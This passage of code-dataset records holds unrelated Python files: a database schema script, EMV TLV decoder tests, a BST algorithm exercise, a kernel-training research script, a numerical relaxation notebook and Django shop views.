cur.execute(\"CREATE TABLE foodImages( \\\r\n submissionID uuid, \\\r\n userID int NOT NULL, \\\r\n isProcessed bool NOT NULL, \\\r\n imagePath varchar NOT NULL, \\\r\n imageType varchar NOT NULL, \\\r\n latitude real NOT NULL, \\\r\n longitude real NOT NULL, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n resultPath varchar, \\\r\n classifier varchar, \\\r\n accuracy real, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT foodImages_pk PRIMARY KEY (submissionID) \\\r\n );\")\r\n\r\n #ocrImages table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE ocrImages( \\\r\n submissionID uuid, \\\r\n userID int NOT NULL, \\\r\n isProcessed bool NOT NULL, \\\r\n imagePath varchar NOT NULL, \\\r\n imageType varchar NOT NULL, \\\r\n latitude real NOT NULL, \\\r\n longitude real NOT NULL, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n resultPath varchar, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT ocrImages_pk PRIMARY KEY (submissionID) \\\r\n );\")\r\n\r\n #barcodes table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE barcodes( \\\r\n submissionID uuid, \\\r\n userID int NOT NULL, \\\r\n barcode int NOT NULL, \\\r\n latitude real NOT NULL, \\\r\n longitude real NOT NULL, \\\r\n angle real, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT barcodes_pk PRIMARY KEY (submissionID) \\\r\n );\")\r\n\r\n #calorieIntake table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n cur.execute(\"CREATE TABLE calorieIntake( \\\r\n userID int, \\\r\n submissionDate date, \\\r\n calories int NOT NULL, \\\r\n TEE real NOT NULL, \\\r\n steps int NOT NULL, \\\r\n weight real NOT NULL, \\\r\n foodCalorieIntake int NOT NULL, \\\r\n captureDateClient timestamp with time zone NOT NULL, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT calorieIntake_pk PRIMARY KEY (userID, submissionDate) \\\r\n );\")\r\n\r\n #Inserting foreign keys\r\n cur.execute(\"ALTER TABLE foodImages ADD CONSTRAINT foodImages_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON DELETE CASCADE; \\\r\n \tALTER TABLE ocrImages ADD CONSTRAINT ocrImages_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON UPDATE CASCADE ON DELETE CASCADE; \\\r\n ALTER TABLE barcodes ADD CONSTRAINT barcodes_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON UPDATE CASCADE ON DELETE CASCADE; \\\r\n ALTER TABLE calorieIntake ADD CONSTRAINT calorieintake_fk0 FOREIGN KEY(userID) REFERENCES users(userID) ON UPDATE CASCADE ON DELETE CASCADE\")\r\n\r\n #Commit database changes, close connection\r\n conn.commit()\r\n cur.close()\r\n conn.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"vurhd1/EPICS-APPS-Database-Scripts","sub_path":"DatabaseScripts/Create_Table_Structure.py","file_name":"Create_Table_Structure.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7359306990","text":"import unittest\n\nfrom pyemvtlv.types.tags import *\nfrom pyemvtlv.codec.binary.decoder import decode as pber_dec\nfrom binascii import unhexlify\n\n\nclass TestDecodePBER(unittest.TestCase):\n def test_decode0x91(self):\n input = '910a90ca8abbfee0be240012'\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, IssuerAuthenticationData(hexvalue='90ca8abbfee0be240012'))\n self.assertEqual(remain, b'')\n\n def test_decode0x71(self):\n input = '711e9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa1'\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, IssuerScriptTemplate1(hexvalue='9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa1'))\n self.assertEqual(remain, b'')\n\n def test_decode0x8a(self):\n input = '8a023030'\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, AuthorisationResponseCode(hexvalue='3030'))\n self.assertEqual(remain, b'')\n\n def test_chain(self):\n input = '910a90ca8abbfee0be240012711e9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa18a023030'\n subs = unhexlify(input)\n l = []\n while subs:\n res, subs = pber_dec(subs)\n if res:\n l.append(res)\n self.assertEqual(l, [IssuerAuthenticationData(hexvalue='90ca8abbfee0be240012'),\n IssuerScriptTemplate1(hexvalue='9f1804000000018615842400021022c3089f35064c142447f11fa2ec0aa1'),\n AuthorisationResponseCode(hexvalue='3030')])\n\n def test_shortdecodeV(self):\n input = '8a033030'\n self.assertRaisesRegexp(ValueError, 'Insufficient remaining substrate - 1 bytes short', pber_dec, unhexlify(input))\n\n def test_shortdecodeL(self):\n input = '8a8201'\n self.assertRaisesRegexp(ValueError, 'Short decode on length parsing - 1 bytes short', pber_dec, unhexlify(input))\n\n def test_shortdecodeT(self):\n input = '9f'\n self.assertRaisesRegexp(ValueError, 'Short octet stream on long tag decoding', pber_dec, unhexlify(input))\n\n def test_failfind(self):\n input = '0a0101'\n self.assertRaisesRegexp(ValueError, 'Cannot find tagId A', pber_dec, unhexlify(input))\n\n def test_decodelong(self):\n input = '8a820101' + '00' * 257\n res, remain = pber_dec(unhexlify(input))\n self.assertEqual(res, AuthorisationResponseCode(hexvalue='00' * 257))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mmattice/pyemvtlv","sub_path":"test/test_decode_pseudo_ber.py","file_name":"test_decode_pseudo_ber.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"42314374797","text":"# -*- coding:utf-8 -*-\n\n__author__ = 'huanghf'\n\n\"\"\"\n给定一个二叉搜索树,编写一个函数 kthSmallest 来查找其中第 k 个最小的元素。\n\n说明:\n你可以假设 k 总是有效的,1 ≤ k ≤ 二叉搜索树元素个数。\n\n示例 1:\n\n输入: root = [3,1,4,null,2], k = 1\n 3\n / \\\n 1 4\n \\\n 2\n输出: 1\n示例 2:\n\n输入: root = [5,3,6,2,4,null,null,1], k = 3\n 5\n / \\\n 3 6\n / \\\n 2 4\n /\n 1\n输出: 3\n进阶:\n如果二叉搜索树经常被修改(插入/删除操作)并且你需要频繁地查找第 k 小的值,你将如何优化 kthSmallest 函数?\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n\n def getinorder(self, root):\n stack = []\n inorder = []\n cur = root\n while stack or cur:\n if cur:\n stack.append(cur)\n cur = cur.left\n else:\n node = stack.pop()\n inorder.append(node.val)\n cur = node.right\n return inorder\n\n def kthSmallest(self, root, k):\n \"\"\"\n :type root: TreeNode\n :type k: int\n :rtype: int\n \"\"\"\n inorder = self.getinorder(root)\n return inorder[k - 1]\n\n def kthSmallest2(self, root, k):\n \"\"\"\n yield骚操作\n :type root: TreeNode\n :type k: int\n :rtype: int\n \"\"\"\n\n def gen(r):\n if r is not None:\n yield from gen(r.left)\n yield r.val\n yield from gen(r.right)\n\n it = gen(root)\n for _ in range(k):\n ans = next(it)\n return ans","repo_name":"lovehhf/LeetCode","sub_path":"230_二叉搜索树中第K小的元素.py","file_name":"230_二叉搜索树中第K小的元素.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"17669990907","text":"import logging\nimport os\nfrom typing import List\nfrom typing import Optional\nfrom typing import Sequence\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport wandb\nfrom omegaconf import OmegaConf\nfrom pytorch_lightning.loggers import WandbLogger\nfrom torch.nn import Parameter\nfrom torch.utils.data import DataLoader\n\nimport research.code.util as H\nfrom disent.nn.functional import torch_conv2d_channel_wise_fft\nfrom disent.nn.loss.softsort import spearman_rank_loss\nfrom disent.nn.modules import DisentLightningModule\nfrom disent.nn.modules import DisentModule\nfrom disent.util.lightning.callbacks import BaseCallbackPeriodic\nfrom disent.util.lightning.logger_util import wb_log_metrics\nfrom disent.util.seeds import seed\nfrom disent.util.strings.fmt import make_box_str\nfrom experiment.run import hydra_get_callbacks\nfrom experiment.run import hydra_get_gpus\nfrom experiment.run import hydra_make_logger\nfrom experiment.util.hydra_main import hydra_main\nfrom experiment.util.hydra_utils import make_non_strict\n\n\nlog = logging.getLogger(__name__)\n\n\n# ========================================================================= #\n# EXP #\n# ========================================================================= #\n\n\ndef disentangle_loss(\n batch: torch.Tensor,\n aug_batch: Optional[torch.Tensor],\n factors: torch.Tensor,\n num_pairs: int,\n f_idxs: Optional[List[int]] = None,\n loss_fn: str = 'mse',\n mean_dtype=None,\n corr_mode: str = 'improve',\n regularization_strength: float = 1.0,\n factor_sizes: Optional[torch.Tensor] = None, # scale the distances | Must be the same approach as `GroundTruthDistSampler`\n) -> torch.Tensor:\n assert len(batch) == len(factors)\n assert batch.ndim == 4\n assert factors.ndim == 2\n # random pairs\n ia, ib = torch.randint(0, len(batch), size=(2, num_pairs), device=batch.device)\n # get pairwise distances\n b_dists = H.pairwise_loss(batch[ia], batch[ib], mode=loss_fn, mean_dtype=mean_dtype) # avoid precision errors\n if aug_batch is not None:\n assert aug_batch.shape == batch.shape\n b_dists += H.pairwise_loss(aug_batch[ia], aug_batch[ib], mode=loss_fn, mean_dtype=mean_dtype)\n # compute factor differences\n if f_idxs is not None:\n f_diffs = factors[ia][:, f_idxs] - factors[ib][:, f_idxs]\n else:\n f_diffs = factors[ia] - factors[ib]\n # scale the factor distances\n if factor_sizes is not None:\n assert factor_sizes.ndim == 1\n assert factor_sizes.shape == factors.shape[1:]\n scale = torch.maximum(torch.ones_like(factor_sizes), factor_sizes - 1)\n f_diffs = f_diffs / scale.detach()\n # compute factor distances\n f_dists = torch.abs(f_diffs).sum(dim=-1)\n # optimise metric\n if corr_mode == 'improve': loss = spearman_rank_loss(b_dists, -f_dists, regularization_strength=regularization_strength) # default one to use!\n elif corr_mode == 'invert': loss = spearman_rank_loss(b_dists, +f_dists, regularization_strength=regularization_strength)\n elif corr_mode == 'none': loss = +torch.abs(spearman_rank_loss(b_dists, -f_dists, regularization_strength=regularization_strength))\n elif corr_mode == 'any': loss = -torch.abs(spearman_rank_loss(b_dists, -f_dists, regularization_strength=regularization_strength))\n else: raise KeyError(f'invalid correlation mode: {repr(corr_mode)}')\n # done!\n return loss\n\n\nclass DisentangleModule(DisentLightningModule):\n\n def __init__(\n self,\n model,\n hparams,\n disentangle_factor_idxs: Sequence[int] = None\n ):\n super().__init__()\n self.model = model\n self.hparams.update(hparams)\n self._disentangle_factors = None if (disentangle_factor_idxs is None) else np.array(disentangle_factor_idxs)\n\n def configure_optimizers(self):\n return H.make_optimizer(self, name=self.hparams.exp.optimizer.name, lr=self.hparams.exp.optimizer.lr, weight_decay=self.hparams.exp.optimizer.weight_decay)\n\n def training_step(self, batch, batch_idx):\n (x,), (f,) = batch['x_targ'], batch['factors']\n # feed forward batch\n y = self.model(x)\n # compute pairwise distances of factors and batch, and optimize to correspond\n loss_rank = disentangle_loss(\n batch = x if self.hparams.exp.train.combined_loss else y,\n aug_batch = y if self.hparams.exp.train.combined_loss else None,\n factors=f,\n num_pairs=int(len(x) * self.hparams.exp.train.pairs_ratio),\n f_idxs=self._disentangle_factors,\n loss_fn=self.hparams.exp.train.loss,\n mean_dtype=torch.float64,\n regularization_strength=self.hparams.exp.train.reg_strength,\n factor_sizes=None,\n )\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n if hasattr(self.model, 'augment_loss'):\n loss_aug = self.model.augment_loss(self)\n else:\n loss_aug = 0\n loss = loss_rank + loss_aug\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n self.log('loss_rank', float(loss_rank), prog_bar=True)\n self.log('loss', float(loss), prog_bar=True)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n return loss\n\n def forward(self, x):\n return self.model(x)\n\n\n# ========================================================================= #\n# MAIN #\n# ========================================================================= #\n\n\n_REPR_FN_INIT = {\n 'none': lambda x: x,\n 'square': lambda x: torch.sqrt(torch.abs(x)),\n 'abs': lambda x: torch.abs(x),\n 'exp': lambda x: torch.log(torch.abs(x)),\n}\n\n_REPR_FN = {\n 'none': lambda x: x,\n 'square': lambda x: torch.square(x),\n 'abs': lambda x: torch.abs(x),\n 'exp': lambda x: torch.exp(x),\n}\n\n\n\nclass Kernel(DisentModule):\n\n def __init__(\n self,\n radius: int = 33,\n channels: int = 1,\n # loss settings\n train_symmetric_regularise: bool = True,\n train_norm_regularise: bool = True,\n train_nonneg_regularise: bool = True,\n train_regularize_l2_weight: Optional[float] = None,\n # kernel settings\n represent_mode: str = 'abs',\n init_offset: float = 0.0,\n init_scale: float = 0.001,\n init_sums_to_one: bool = True,\n ):\n super().__init__()\n assert channels in (1, 3)\n assert set(_REPR_FN_INIT.keys()) == set(_REPR_FN.keys())\n assert represent_mode in _REPR_FN, f'invalid represent_mode: {repr(represent_mode)}'\n # initialize\n with torch.no_grad():\n # randomly sample value\n if represent_mode == 'none':\n kernel = torch.rand(1, channels, 2*radius+1, 2*radius+1, dtype=torch.float32)\n else:\n kernel = torch.randn(1, channels, 2*radius+1, 2*radius+1, dtype=torch.float32)\n # scale values\n kernel = init_offset + kernel * init_scale\n if init_sums_to_one:\n kernel = kernel / kernel.sum(dim=[-1, -2], keepdim=True)\n # log params\n kernel = _REPR_FN_INIT[represent_mode](kernel)\n assert not torch.any(torch.isnan(kernel))\n # store\n self.__kernel = Parameter(kernel)\n self._represent_mode = represent_mode\n # regularise options\n self._train_symmetric_regularise = train_symmetric_regularise\n self._train_norm_regularise = train_norm_regularise\n self._train_nonneg_regularise = train_nonneg_regularise\n self._train_regularize_l2_weight = train_regularize_l2_weight\n\n @property\n def kernel(self) -> torch.Tensor:\n return _REPR_FN[self._represent_mode](self.__kernel)\n\n def forward(self, xs):\n return torch_conv2d_channel_wise_fft(xs, self.kernel)\n\n def make_train_periodic_callback(self, cfg, dataset) -> BaseCallbackPeriodic:\n class ImShowCallback(BaseCallbackPeriodic):\n def do_step(self, trainer: pl.Trainer, pl_module: pl.LightningModule):\n # get kernel image\n img_kernel = H.to_img(pl_module.model.kernel[0], scale=True).numpy()\n img_kernel_log = H.to_img(torch.log(pl_module.model.kernel[0]), scale=True).numpy()\n # augment function\n def augment_fn(batch):\n return H.to_imgs(pl_module.forward(batch.to(pl_module.device)), scale=True)\n # get augmented traversals\n with torch.no_grad():\n orig_wandb_image, orig_wandb_animation = H.visualize_dataset_traversal(dataset, augment_fn=None, data_mode='raw', output_wandb=True) # dataset returns (numpy?) HWC batches\n augm_wandb_image, augm_wandb_animation = H.visualize_dataset_traversal(dataset, augment_fn=augment_fn, data_mode='input', output_wandb=True) # dataset returns (tensor) CHW batches\n # log images to WANDB\n wb_log_metrics(trainer.logger, {\n 'kernel': wandb.Image(img_kernel),\n 'kernel_ln': wandb.Image(img_kernel_log),\n 'traversal_img_orig': orig_wandb_image, 'traversal_animation_orig': orig_wandb_animation,\n 'traversal_img_augm': augm_wandb_image, 'traversal_animation_augm': augm_wandb_animation,\n })\n return ImShowCallback(every_n_steps=cfg.exp.out.show_every_n_steps, begin_first_step=True)\n\n def augment_loss(self, framework: DisentLightningModule):\n augment_loss = 0\n # symmetric loss\n if self._train_symmetric_regularise:\n k, kt = self.kernel[0], torch.transpose(self.kernel[0], -1, -2)\n loss_symmetric = 0\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-1]), k, mode='mae').mean()\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-2]), k, mode='mae').mean()\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-1]), kt, mode='mae').mean()\n loss_symmetric += H.unreduced_loss(torch.flip(k, dims=[-2]), kt, mode='mae').mean()\n # log loss\n framework.log('loss_sym', float(loss_symmetric), prog_bar=True)\n # final loss\n augment_loss += loss_symmetric\n # regularize, try make kernel as small as possible\n if (self._train_regularize_l2_weight is not None) and (self._train_regularize_l2_weight > 0):\n k = self.kernel[0]\n loss_l2 = self._train_regularize_l2_weight * (k ** 2).mean()\n framework.log('loss_l2', float(loss_l2), prog_bar=True)\n augment_loss += loss_l2\n # sum of 1 loss, per channel\n if self._train_norm_regularise:\n k = self.kernel[0]\n # sum over W & H resulting in: (C, W, H) -> (C,)\n channel_sums = k.sum(dim=[-1, -2])\n channel_loss = H.unreduced_loss(channel_sums, torch.ones_like(channel_sums), mode='mse')\n norm_loss = channel_loss.mean()\n # log loss\n framework.log('loss_norm', float(norm_loss), prog_bar=True)\n # final loss\n augment_loss += norm_loss\n # no negatives regulariser\n if self._train_nonneg_regularise:\n k = self.kernel[0]\n nonneg_loss = torch.abs(k[k < 0].sum())\n # log loss\n framework.log('loss_nonneg', float(nonneg_loss), prog_bar=True)\n # regularise negatives\n augment_loss += nonneg_loss\n # stats\n framework.log('kernel_mean', float(self.kernel.mean()), prog_bar=False)\n framework.log('kernel_std', float(self.kernel.std()), prog_bar=False)\n # return!\n return augment_loss\n\n\n# ========================================================================= #\n# Run Hydra #\n# ========================================================================= #\n\n\ndef run_disentangle_dataset_kernel(cfg):\n cfg = make_non_strict(cfg)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # TODO: some of this code is duplicated between this and the main experiment run.py\n # check CUDA setting\n cfg.trainer.setdefault('cuda', 'try_cuda')\n gpus = hydra_get_gpus(cfg)\n # CREATE LOGGER\n logger = hydra_make_logger(cfg)\n if isinstance(logger.experiment, WandbLogger):\n _ = logger.experiment # initialize\n # TRAINER CALLBACKS\n callbacks = hydra_get_callbacks(cfg)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n seed(cfg.settings.job.seed)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # initialise dataset and get factor names to disentangle\n dataset = H.make_dataset(cfg.exp.data.name, factors=True, data_root=cfg.dsettings.storage.data_root)\n disentangle_factor_idxs = dataset.gt_data.normalise_factor_idxs(cfg.exp.kernel.disentangle_factors)\n cfg.exp.kernel.disentangle_factors = tuple(dataset.gt_data.factor_names[i] for i in disentangle_factor_idxs)\n log.info(f'Dataset has ground-truth factors: {dataset.gt_data.factor_names}')\n log.info(f'Chosen ground-truth factors are: {tuple(cfg.exp.kernel.disentangle_factors)}')\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # print everything\n log.info('Final Config' + make_box_str(OmegaConf.to_yaml(cfg)))\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n dataloader = DataLoader(\n dataset,\n batch_sampler=H.StochasticBatchSampler(dataset, batch_size=cfg.datamodule.dataloader.batch_size),\n num_workers=cfg.datamodule.dataloader.num_workers,\n pin_memory=cfg.datamodule.dataloader.pin_memory,\n )\n model = Kernel(radius=cfg.exp.kernel.radius, channels=cfg.exp.kernel.channels, init_offset=cfg.exp.kernel.init_offset, init_scale=cfg.exp.kernel.init_scale, train_symmetric_regularise=cfg.exp.kernel.regularize_symmetric, train_norm_regularise=cfg.exp.kernel.regularize_norm, train_nonneg_regularise=cfg.exp.kernel.regularize_nonneg, represent_mode=cfg.exp.kernel.represent_mode, init_sums_to_one=cfg.exp.kernel.init_sums_to_one, train_regularize_l2_weight=cfg.exp.kernel.regularize_l2_weight)\n callbacks.append(model.make_train_periodic_callback(cfg, dataset=dataset))\n framework = DisentangleModule(model, cfg, disentangle_factor_idxs=disentangle_factor_idxs)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n if logger:\n logger.log_hyperparams(cfg)\n # train\n trainer = pl.Trainer(\n log_every_n_steps=cfg.trainer.log_every_n_steps,\n logger=logger,\n callbacks=callbacks,\n gpus=1 if gpus else 0,\n max_epochs=cfg.trainer.max_epochs,\n max_steps=cfg.trainer.max_steps,\n enable_progress_bar=False,\n # we do this here so we don't run the final metrics\n detect_anomaly=False, # this should only be enabled for debugging torch and finding NaN values, slows down execution, not by much though?\n enable_checkpointing=False,\n )\n trainer.fit(framework, dataloader)\n # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ #\n # save kernel\n if cfg.exp.out.rel_save_dir is not None:\n assert not os.path.isabs(cfg.exp.out.rel_save_dir), f'rel_save_dir must be relative: {repr(cfg.exp.out.rel_save_dir)}'\n save_dir = os.path.join(ROOT_DIR, cfg.exp.out.rel_save_dir)\n assert os.path.isabs(save_dir), f'save_dir must be absolute: {repr(save_dir)}'\n # save kernel\n H.torch_write(os.path.join(save_dir, cfg.exp.out.save_name), framework.model.kernel.cpu().detach())\n\n\n# ========================================================================= #\n# Entry Point #\n# ========================================================================= #\n\n\nif __name__ == '__main__':\n # HYDRA:\n # run experiment (12min * 4*8*2) / 60 ~= 12 hours\n # but speeds up as kernel size decreases, so might be shorter\n # EXP ARGS:\n # $ ... -m optimizer.weight_decay=1e-4,0.0 kernel.radius=63,55,47,39,31,23,15,7 dataset.spacing=8,4,2,1\n\n ROOT_DIR = os.path.abspath(__file__ + '/../../../..')\n CONFIGS_THIS_EXP = os.path.abspath(os.path.join(__file__, '..', 'config'))\n CONFIGS_RESEARCH = os.path.abspath(os.path.join(__file__, '../../..', 'config'))\n\n # launch the action\n hydra_main(\n callback=run_disentangle_dataset_kernel,\n config_name='config_adversarial_kernel',\n search_dirs_prepend=[CONFIGS_THIS_EXP, CONFIGS_RESEARCH],\n log_level=logging.INFO,\n )\n","repo_name":"nmichlo/msc-research","sub_path":"research/part03_learnt_overlap/e01_learn_to_disentangle/run_03_train_disentangle_kernel.py","file_name":"run_03_train_disentangle_kernel.py","file_ext":"py","file_size_in_byte":16520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"17830196548","text":"import laserbeam\nfrom os.path import exists, join\n\ndef main():\n\n trainer = laserbeam.Trainer()\n\n\n\n if exists(join(trainer.model_path, \"checkpoint\")):\n trainer.load_checkpoint(join(trainer.model_path, \"checkpoint\", 'epoch069_2020-08-25_14-22-06.pth'))\n #trainer.load_checkpoint()\n\n #print(history, current_epoch)\n #train_model(100,20)\n trainer.evaluate()\n #print(len(datasets['test']))\n #example = trainer.datasets['test'].samples_dataframe.iloc[733]\n #output = trainer.test_single_example(example)\n #print(180.0 * output)\n #print(example)\n \n\n\nif __name__ == '__main__':\n main()\n\n \n","repo_name":"braianps/laserbeam","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"86"} +{"seq_id":"3834834022","text":"#!/bin/env python\n#coding=utf8\n\ndef get_context_info(readfile):\n if str(type(readfile)).find('str') >= 0:\n inverted_list = open(readfile, 'r')\n else:\n inverted_list = readfile\n\n context_list = {}\n\n for line in inverted_list:\n elements = line.split()\n word = elements[0]\n context_sum = []\n flag1 = 0\n flag2 = 0\n for index in range(1, len(elements)):\n if flag1 == flag2:\n context = []\n remainder = index % 6\n if remainder >= 1 and remainder <= 4:\n context.append(elements[index])\n flag1 += 1\n if remainder == 0:\n flag2 += 4\n context_sum.append(context)\n context_list[word] = context_sum\n\n return context_list\n","repo_name":"teddy-hoo/ReviewSummary","sub_path":"oldcode/get_context.py","file_name":"get_context.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"23261833733","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# ## Day 30 prep\r\n\r\n# In[17]:\r\n\r\n\r\nget_ipython().run_line_magic('matplotlib', 'widget')\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# In[30]:\r\n\r\n\r\nfig1, ax1 = plt.subplots()\r\nx = np.linspace(0,2,100)\r\nax1.plot(x,np.exp(-x))\r\nax1.plot(x,x)\r\n\r\n\r\n# In[18]:\r\n\r\n\r\nx = 1\r\nfor i in range(10):\r\n x = np.exp(-x)\r\n print(x)\r\n\r\n\r\n# In[19]:\r\n\r\n\r\nx = -20\r\nfor i in range(20):\r\n x = np.exp(-x)\r\n print(x)\r\n\r\n\r\n# Let's try a slightly different function though.\r\n# $$x = e^{1-x^2}$$\r\n\r\n# In[28]:\r\n\r\n\r\nx = 10\r\nfor i in range(20):\r\n x = np.exp(1-x**2)\r\n print(x)\r\n\r\n\r\n# The above function doesn't seem so different, and yet the results aren't working. Let's plot and see.\r\n\r\n# In[34]:\r\n\r\n\r\nfig0, ax0 = plt.subplots()\r\nt = np.linspace(0,2,100)\r\nax0.plot(t, np.exp(1-t**2))\r\nax0.plot(t,t)\r\n\r\n\r\n# Now the problem relaxation method doesn't seem to work so well. However, there is an interesting trick with this we can play. Let's solve the problem the other way around.\r\n# \r\n# $$x = e^{1-x^2} \\rightarrow x = \\sqrt{1-\\log{x}}$$\r\n\r\n# In[55]:\r\n\r\n\r\nfig2, ax2 = plt.subplots()\r\nx = np.linspace(0.01,2,100)\r\nax2.plot(x, np.sqrt(1-np.log(x)))\r\nax2.plot(x,x)\r\n\r\n\r\n# In[38]:\r\n\r\n\r\nx = 2\r\nfor i in range(20):\r\n x = np.sqrt(1-np.log(x))\r\n print(x)\r\n\r\n\r\n# We can beef up this method slightly to report a result after the answer get sufficiently close to the \"true\" answer. We can do this by subtraction for example.\r\n\r\n# In[50]:\r\n\r\n\r\nx = 2\r\ne = 1\r\nwhile abs(e) > 0.0000001:\r\n x1 = np.sqrt(1-np.log(x))\r\n e = x1-x\r\n x = x1\r\nprint(x)\r\n\r\n\r\n# In[47]:\r\n\r\n\r\nx+e\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"ehremington/ph390","sub_path":"comp-class/develop/post-save-hook/day30-prep.py","file_name":"day30-prep.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"23634433763","text":"import re\r\nfrom django.shortcuts import render, redirect, get_object_or_404, reverse\r\nfrom .models import *\r\nfrom .forms import UserCreationForm, PostForm\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth.models import User\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom .forms import CreateUserForm\r\n\r\n# Create your views here.\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\ndef visita(request):\r\n return render(request, 'indexx.html')\r\n\r\ndef acerca(request):\r\n return render(request, 'acerca.html')\r\n\r\ndef feed(request):\r\n context = {\r\n #'profile' \"\"\r\n 'posts': Post.objects.all()\r\n }\r\n return render(request, 'feed.html', context)\r\n\r\n@login_required\r\ndef post(request):\r\n\tcurrent_user = get_object_or_404(User, pk=request.user.pk)\r\n\tif request.method == 'POST':\r\n\t\tform = PostForm(request.POST)\r\n\t\tif form.is_valid():\r\n\t\t\tpost = form.save(commit=False)\r\n\t\t\tpost.user = current_user\r\n\t\t\tpost.save()\r\n\t\t\tmessages.success(request, 'Post enviado')\r\n\t\t\treturn redirect('feed')\r\n\telse:\r\n\t\tform = PostForm()\r\n\treturn render(request, 'post.html', {'form' : form })\r\n\r\ndef register(request):\r\n if request.method == 'POST':\r\n form = CreateUserForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n user = form.cleaned_data.get('username')\r\n Cart.objects.create(user = User.objects.get(username = user), total = 0.00)\r\n messages.success(request,'se ha creado la cuenta de' + user)\r\n\r\n return redirect('login')\r\n else:\r\n form = CreateUserForm()\r\n\r\n context = {'form': form}\r\n return render(request, 'RegistrarUser.html', context)\r\n\r\ndef loginpage(request):\r\n if request.method == 'POST':\r\n username = request.POST.get('username')\r\n password = request.POST.get('password')\r\n\r\n users = authenticate(request, username = username, password = password)\r\n\r\n if users is not None:\r\n login(request, users)\r\n return redirect('index')\r\n else:\r\n messages.info(request, 'contrasena incorrecta')\r\n\r\n context = {}\r\n return render(request, 'login.html', context)\r\n\r\ndef logoutpage(request):\r\n logout(request)\r\n return redirect(\"index\")\r\n\r\ndef products(request):\r\n if request.user.is_authenticated:\r\n context = {\r\n 'item_cats': Item_Category.objects.all(),\r\n 'items': Item.objects.all(),\r\n 'toppings': Topping.objects.all()\r\n }\r\n return render(request, 'productos.html', context)\r\n else:\r\n return redirect('login')\r\n\r\ndef addItem_view(request):\r\n \r\n if request.method == 'POST':\r\n try:\r\n item_id = request.POST['item-id']\r\n except:\r\n item_id = None\r\n try:\r\n max_topping = request.POST['max-topping']\r\n except:\r\n max_topping = None\r\n try:\r\n size = request.POST['size-select']\r\n except:\r\n size = None\r\n \r\n toppings = []\r\n if max_topping:\r\n for i in max_topping:\r\n try:\r\n top = request.POST[f'select-{i}']\r\n toppings.append(Topping.objects.get(pk=top))\r\n except:\r\n pass\r\n\r\n item = Item.objects.get(pk=item_id)\r\n if size == '1 logo':\r\n price = item.price_small\r\n elif size == '2 logo':\r\n price = item.price_large\r\n \r\n print(request.user)\r\n cart = Cart.objects.get(user=request.user)\r\n cart_item = Cart_Item(cart=cart, item_detail=item, size=size, price=price)\r\n cart_item.save()\r\n if 